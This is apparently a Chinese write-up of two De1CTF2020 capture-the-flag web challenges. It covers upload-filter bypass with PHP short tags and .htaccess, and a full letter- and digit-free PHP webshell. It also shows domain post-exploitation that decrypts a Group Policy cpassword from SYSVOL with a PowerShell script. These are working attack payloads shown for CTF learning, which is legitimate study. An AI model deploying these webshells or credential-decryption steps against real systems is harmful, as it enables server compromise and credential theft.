check in
考点:文件上传过滤ph,短标签命令执行绕过,.htaccess攻击
知识点:<?=和<? echo等价,从PHP5.4.0后起<?=总是可用的
<?=eval($_POST[‘cmd’]);相当于<? echo eval($_POST[‘cmd’]);
抓包,随便上传了个马,发现存在内容黑名单
过滤了ph,尝试用短标签绕过本地测试了下,这样的短标签可以执行任意系统命令,system也可以
于是我们去选择构造如下的payload上传,让他直接执行命令 ,其中注意.htaccess中的php部分用换行绕过,同时修改Content-Type类型
最后访问得到flag
如果要getshell可以蚁剑连接的话上传<?=eval($_POST[‘cmd’]);
Hard_Pentest_1
考点: 短标签+无字母数字webshell+内网渗透
打开题目的源码如下:
<?php
//Clear the uploads directory every hour
highlight_file(__FILE__);
$sandbox = "uploads/". md5("De1CTF2020".$_SERVER['REMOTE_ADDR']);
@mkdir($sandbox);
@chdir($sandbox);
if($_POST["submit"]){
if (($_FILES["file"]["size"] < 2048) && Check()){
if ($_FILES["file"]["error"] > 0){
die($_FILES["file"]["error"]);
}
else{
$filename=md5($_SERVER['REMOTE_ADDR'])."_".$_FILES["file"]["name"];
move_uploaded_file($_FILES["file"]["tmp_name"], $filename);
echo "save in:" . $sandbox."/" . $filename;
}
}
else{
echo "Not Allow!";
}
}
function Check(){
$BlackExts = array("php");
$ext = explode(".", $_FILES["file"]["name"]);
$exts = trim(end($ext));
$file_content = file_get_contents($_FILES["file"]["tmp_name"]);
if(!preg_match('/[a-z0-9;~^`&|]/is',$file_content) &&
!in_array($exts, $BlackExts) &&
!preg_match('/\.\./',$_FILES["file"]["name"])) {
return true;
}
return false;
}
?>
<html>
<head>
<meta charset="utf-8">
<title>upload</title>
</head>
<body>
<form action="index.php" method="post" enctype="multipart/form-data">
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="submit">
</form>
</body>
</html>
代码过滤很简单:不允许php后缀,且文件内容不能存在数字和字母,php大小写就绕过了,无数字字母的webshell构造参看一些不包含数字和字母的webshell | 离别歌
<?=$_=[]?>
<?=$_=@"$_"?>
<?=$_=$_['!'=='@']?>
<?=$___=$_?>
<?=$__=$_?>
<?=$__++?>
<?=$__++?>
<?=$__++?>
<?=$__++?>
<?=$__++?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$___.=$__?><?= $___.=$__?>
<?= $__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?>
<?= $___.=$__?>
<?=$__=$_?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?>
<?= $___.=$__?>
<?=$__=$_?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?>
<?= $___.=$__?>
<?=$____='_'?>
<?=$__=$_?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?>
<?=$____.=$__?>
<?=$__=$_?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?>
<?= $____.=$__?>
<?=$__=$_?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?>
<?= $____.=$__?>
<?=$__=$_?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?>
<?= $____.=$__?>
<?= $_=$$____?>
<?= $_[__]($_[_],$_[___])?>
上面这个脚本请仔细研究,很好理解。最后访问得到的路径去写一个马
蚁剑连接后发现是Windows环境,找到一个压缩包,导出,发现需要密码
根据提示继续进行内网渗透,查到域控192.168.0.12,该机器为192.168.0.11并属于De1CTF2020.lab域中
输入net use查看域中的共享连接
接下来参看大佬的Writeup学习到域渗透中SYSVOL还原组策略中保存的密码方法
首先在每个域内都有一个共享的文件夹SYSVOL,路径为:\\<donain>\SYSVOL\,所有域内主机都能访问,里面保存组策略相关数据。因此进入该域中的共享文件夹
然后需要找到相应的策略组id的配置文件,路径为://De1CTF2020.lab/SYSVOL/De1CTF2020.lab/Policies/{B1248E1E-B97D-4C41-8EA4-1F2600F9264B}/Machine/Preferences/Groups/,如下是配置文件Groups.xml的内容
其中cpassword为AES加密的密码,有现成的解密脚本,改一下密码即可
function Get-DecryptedCpassword {
[CmdletBinding()]
Param(
[string]$Cpassword
)
try{
# Append appropriate padding based on string Length
$Mod=($Cpassword.length % 4)
switch($Mod){
'1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length-1)}
'2' {$Cpassword += ('='*(4-$Mod))}
'3' {$Cpassword += ('='*(4-$Mod))}
}
$Base64Decoded=[Convert]::FromBase64String($Cpassword)
#Create a new AES.NET Crypto Object
$AesObject=New-Object System.Security.Cryptography.AesCryptoServiceProvider
[Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
#Set IV to all nulls to prevent dynamic generation of IV value
$AesIV = New-Object Byte[]($Aesobject.IV.Length)
$AesObject.IV=$AesIV
$AesObject.Key=$Aeskey
$DecryptorObject=$Aesobject.CreateDecryptor()
[Byte[]] $OutBlock=$DecryptorObject.TransformFinalBlock($Base64Decoded,0,$Base64Decoded.length)
return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
}
catch {Write-Error $Error[0]}
}
Get-DecryptedCpassword "uYgjj9DCKSxqUp7gZfYzo0F6hOyiYh4VmYBXRAUp+08"//对应密文
保存为1.ps1上传,在虚拟终端运行:powershell -executionpolicy bypass -file 1.ps1,得到压缩包密码,打开得到flag1